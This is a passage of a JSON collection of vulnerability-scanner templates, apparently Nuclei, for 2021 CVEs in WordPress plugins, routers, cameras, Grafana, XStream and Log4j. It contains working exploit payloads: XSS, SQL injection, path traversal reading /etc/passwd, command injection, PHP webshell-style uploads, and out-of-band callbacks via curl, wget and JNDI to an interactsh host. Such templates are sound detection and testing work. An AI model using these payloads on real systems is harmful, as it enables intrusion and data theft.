Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24627","info":{"name":"G Auto-Hyperlink <= 1.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+I\n","GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["c8c605999f3d8352d7bb792cf3fdb25b","Keyword","g-auto-hyperlink-edit"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(echo {{string}}>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{string}}"]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4436","info":{"name":"3DPrint Lite < 1.9.1.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353\n\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"action\"\n\np3dlite_handle_upload\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: text/php\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------54331109111293931601238262353--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jsonrpc\":\"2.0\"","\"filename\":","{{filename}}.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\nGET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\nGET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1"],"condition":"and"}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: 